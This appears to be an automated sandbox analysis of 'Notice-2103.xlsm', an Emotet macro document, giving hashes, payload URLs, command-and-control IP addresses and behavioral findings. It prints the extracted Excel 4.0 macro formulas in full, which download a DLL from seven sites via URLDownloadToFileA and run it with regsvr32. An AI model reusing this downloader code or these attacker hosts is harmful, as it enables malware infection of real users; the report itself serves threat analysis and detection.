General
-
Target
Notice-2103.xlsm
-
Size
35KB
-
Sample
220320-199sasgfeq
-
MD5
b3064579f7a7325f5eafbf8ec83c77c3
-
SHA1
413532da5c57724f4fde1532329f18abcf528bfb
-
SHA256
58213c653d7d4793d62f2eed00abc0ede74d74b36daee6214dda25fad3c4a2de
-
SHA512
0798c5aee103927e5c0ae7853c357ea0cefc5832de44a5ebb0cd8a43636fd95a498c390062d13c5bd4aa479c7d765c8af4e356fe0820707c01f55aa6c3b9ecee
Behavioral task
behavioral1
Sample
Notice-2103.xlsm
Resource
win7-20220311-en
Malware Config
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://c"&"asin"&"ojack"&"po"&"tki"&"ng.co"&"m/cg"&"i-bi"&"n/47s"&"Kbk"&"lS"&"Qf"&"31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://d"&"en"&"talto"&"get"&"her.c"&"om/w"&"p-co"&"nt"&"en"&"t/YNs"&"c"&"IH7jp"&"wh9t"&"wP"&"hW"&"ol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://di"&"rec"&"tor"&"ka"&"y.c"&"om.n"&"g/w"&"p-ad"&"mi"&"n/MY"&"P3"&"NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://d"&"eat"&"rav"&"el.a"&"l/w"&"p-i"&"n"&"clu"&"de"&"s/H5"&"44"&"R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ri"&"zw"&"an"&"su"&"le"&"hri"&"a.c"&"om/c"&"gi-b"&"in/Hf"&"Rb"&"Jzbr"&"gq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ra"&"ss"&"ti.c"&"om/F"&"ox-S"&"S/uJK"&"pjP"&"0kS"&"fD"&"QtF"&"Bw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://w"&"w"&"w.m"&"v-b"&"urg"&"en"&"la"&"nd.a"&"t/w"&"p-ad"&"m"&"in/Rc9"&"nu"&"Jg"&"ma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
Extracted
emotet
Epoch5
80.211.107.116:8080
188.166.229.148:443
121.78.112.42:8080
185.148.168.15:8080
210.57.209.142:8080
194.9.172.107:8080
139.196.72.155:8080
128.199.192.135:8080
62.171.178.147:8080
103.133.214.242:8080
104.131.62.48:8080
103.41.204.169:8080
54.37.106.167:8080
217.182.143.207:443
185.148.168.220:8080
202.134.4.210:7080
198.199.98.78:8080
5.56.132.177:8080
66.42.57.149:443
78.46.73.125:443
191.252.103.16:80
54.37.228.122:443
88.217.172.165:8080
190.90.233.66:443
68.183.93.250:443
85.25.120.45:8080
78.47.204.80:443
93.104.209.107:8080
37.59.209.141:8080
159.69.237.188:443
207.148.81.119:8080
185.168.130.138:443
87.106.97.83:7080
45.71.195.104:8080
196.44.98.190:8080
195.77.239.39:8080
36.67.23.59:443
103.82.248.59:7080
203.153.216.46:443
37.44.244.177:8080
116.124.128.206:8080
2.58.16.87:8080
202.28.34.99:8080
118.98.72.86:443
59.148.253.194:443
54.38.242.185:443
85.214.67.203:8080
195.154.146.35:443
103.42.58.120:7080
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
Targets
-
-
Target
Notice-2103.xlsm
-
Size
35KB
-
MD5
b3064579f7a7325f5eafbf8ec83c77c3
-
SHA1
413532da5c57724f4fde1532329f18abcf528bfb
-
SHA256
58213c653d7d4793d62f2eed00abc0ede74d74b36daee6214dda25fad3c4a2de
-
SHA512
0798c5aee103927e5c0ae7853c357ea0cefc5832de44a5ebb0cd8a43636fd95a498c390062d13c5bd4aa479c7d765c8af4e356fe0820707c01f55aa6c3b9ecee
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Downloads MZ/PE file
-
Loads dropped DLL
-
Drops file in System32 directory
-